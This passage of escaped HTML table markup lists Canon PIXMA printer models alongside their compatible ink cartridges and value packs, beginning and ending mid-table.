Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td 